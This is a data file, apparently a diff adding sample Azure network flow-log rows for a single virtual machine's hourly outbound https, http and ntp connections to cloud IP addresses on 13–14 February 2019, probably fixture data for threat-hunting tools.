+31,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.795,2019-02-13 21:00:31.000,2019-02-13 21:55:37.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,21.0
+29,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.779,2019-02-13 21:06:20.000,2019-02-13 21:57:32.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+13,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.382,2019-02-13 21:08:46.000,2019-02-13 21:48:45.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+14,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.382,2019-02-13 21:08:46.000,2019-02-13 21:48:45.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+28,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.185,2019-02-13 21:08:48.000,2019-02-13 21:58:52.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.68.93.109', '65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+27,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.185,2019-02-13 21:08:48.000,2019-02-13 21:58:52.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.68.93.109', '65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+26,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.185,2019-02-13 21:08:48.000,2019-02-13 21:58:52.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.68.93.109', '65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,13.68.93.109,9.0
+25,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.123,2019-02-13 21:09:10.000,2019-02-13 21:09:10.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+11,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.101,2019-02-13 21:09:44.000,2019-02-13 21:09:44.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+21,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.654,2019-02-13 21:10:58.000,2019-02-13 21:53:11.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.200', '204.79.197.200', '134.170.58.123']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,72.21.81.200,5.0
+22,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.654,2019-02-13 21:10:58.000,2019-02-13 21:53:11.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.200', '204.79.197.200', '134.170.58.123']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,204.79.197.200,5.0
+23,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.654,2019-02-13 21:10:58.000,2019-02-13 21:53:11.000,2019-02-13 22:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.200', '204.79.197.200', '134.170.58.123']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,,eastus,134.170.58.123,5.0
+20,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.960,2019-02-13 21:10:59.000,2019-02-13 21:11:04.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+24,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:52.435,2019-02-13 21:11:03.000,2019-02-13 21:11:03.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+640,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:00:34.000,2019-02-13 22:59:09.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+641,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:00:34.000,2019-02-13 22:59:09.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+645,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:08:46.000,2019-02-13 22:53:49.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+644,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:08:46.000,2019-02-13 22:53:49.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+639,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:09:10.000,2019-02-13 22:09:10.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+649,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:13:52.000,2019-02-13 22:58:53.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+650,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:13:52.000,2019-02-13 22:58:53.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+646,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:14:36.000,2019-02-13 22:48:44.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+648,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:28:45.000,2019-02-13 22:28:45.000,2019-02-13 23:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+643,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:28:49.000,2019-02-13 22:28:49.000,2019-02-13 23:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['216.58.218.238', '173.194.61.40']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,173.194.61.40,2.0
+642,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.601,2019-02-13 22:28:49.000,2019-02-13 22:28:49.000,2019-02-13 23:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['216.58.218.238', '173.194.61.40']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,216.58.218.238,2.0
+647,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 23:25:32.617,2019-02-13 22:28:49.000,2019-02-13 22:29:08.000,2019-02-13 23:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.15.99,2.0
+660,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:03:56.000,2019-02-13 23:55:24.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+661,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:03:56.000,2019-02-13 23:55:24.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+664,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:05:48.000,2019-02-13 23:57:00.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+663,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:08:46.000,2019-02-13 23:53:50.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+662,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:08:46.000,2019-02-13 23:53:50.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+667,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:08:50.000,2019-02-13 23:58:54.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+666,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:08:50.000,2019-02-13 23:58:54.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+665,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.181,2019-02-13 23:08:50.000,2019-02-13 23:58:54.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+659,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 00:25:39.165,2019-02-13 23:09:10.000,2019-02-13 23:09:10.000,2019-02-14 00:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+633,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:01:06.000,2019-02-14 00:59:12.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,21.0
+632,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:01:06.000,2019-02-14 00:59:12.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,21.0
+635,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:08:46.000,2019-02-14 00:38:50.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+634,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:08:46.000,2019-02-14 00:38:50.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+631,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:09:10.000,2019-02-14 00:09:10.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+637,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:13:54.000,2019-02-14 00:58:54.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+638,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:13:54.000,2019-02-14 00:58:54.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+636,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 01:25:38.249,2019-02-14 00:14:04.000,2019-02-14 00:48:12.000,2019-02-14 01:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+655,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:03:03.000,2019-02-14 01:03:03.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+652,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:03:47.000,2019-02-14 01:56:22.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+653,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:03:47.000,2019-02-14 01:56:22.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+656,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:05:16.000,2019-02-14 01:56:28.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+654,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:08:45.000,2019-02-14 01:58:45.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.65.107.32'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,3.0
+651,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.620,2019-02-14 01:09:10.000,2019-02-14 01:09:10.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+658,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.636,2019-02-14 01:13:54.000,2019-02-14 01:58:55.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+657,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 02:25:56.636,2019-02-14 01:13:54.000,2019-02-14 01:58:55.000,2019-02-14 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+6,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.515,2019-02-14 02:01:57.000,2019-02-14 02:58:16.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+7,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.515,2019-02-14 02:01:57.000,2019-02-14 02:58:16.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+8,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.547,2019-02-14 02:05:03.000,2019-02-14 02:58:55.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69', '65.55.44.108']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,7.0
+9,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.547,2019-02-14 02:05:03.000,2019-02-14 02:58:55.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69', '65.55.44.108']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,7.0
+10,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.547,2019-02-14 02:05:03.000,2019-02-14 02:58:55.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69', '65.55.44.108']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,7.0
+3,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:06.765,2019-02-14 02:08:46.000,2019-02-14 02:48:45.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+2,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:06.765,2019-02-14 02:08:46.000,2019-02-14 02:48:45.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+5,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:07.531,2019-02-14 02:09:10.000,2019-02-14 02:09:10.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+12,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:21.762,2019-02-14 02:13:32.000,2019-02-14 02:47:40.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+4,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 03:26:06.828,2019-02-14 02:30:56.000,2019-02-14 02:30:56.000,2019-02-14 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+620,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 02:59:56.000,2019-02-14 03:54:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.91.29', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,72.21.81.240,3.0
+619,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 02:59:56.000,2019-02-14 03:54:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.91.29', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,72.21.91.29,3.0
+630,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:02.000,2019-02-14 03:58:56.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+629,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:02.000,2019-02-14 03:58:56.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+628,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:00:43.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.64.188.245'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westus,eastus,13.64.188.245,1.0
+625,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:53:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.163.78', '172.217.15.99', '72.21.81.200']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,,eastus,65.55.163.78,4.0
+627,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:53:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.163.78', '172.217.15.99', '72.21.81.200']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,,eastus,72.21.81.200,4.0
+626,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:43.000,2019-02-14 03:53:11.000,2019-02-14 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.163.78', '172.217.15.99', '72.21.81.200']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,,eastus,172.217.15.99,4.0
+617,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:50.000,2019-02-14 03:58:47.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+618,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:00:50.000,2019-02-14 03:58:47.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+623,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:04:44.000,2019-02-14 03:55:56.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+621,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:08:46.000,2019-02-14 03:38:45.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.65.107.32'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,2.0
+616,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:09:10.000,2019-02-14 03:09:10.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+624,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:13:55.000,2019-02-14 03:34:15.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,3.0
+622,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 04:25:40.938,2019-02-14 03:24:03.000,2019-02-14 03:24:03.000,2019-02-14 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+590,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:01:16.000,2019-02-14 04:59:23.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,26.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,26.0
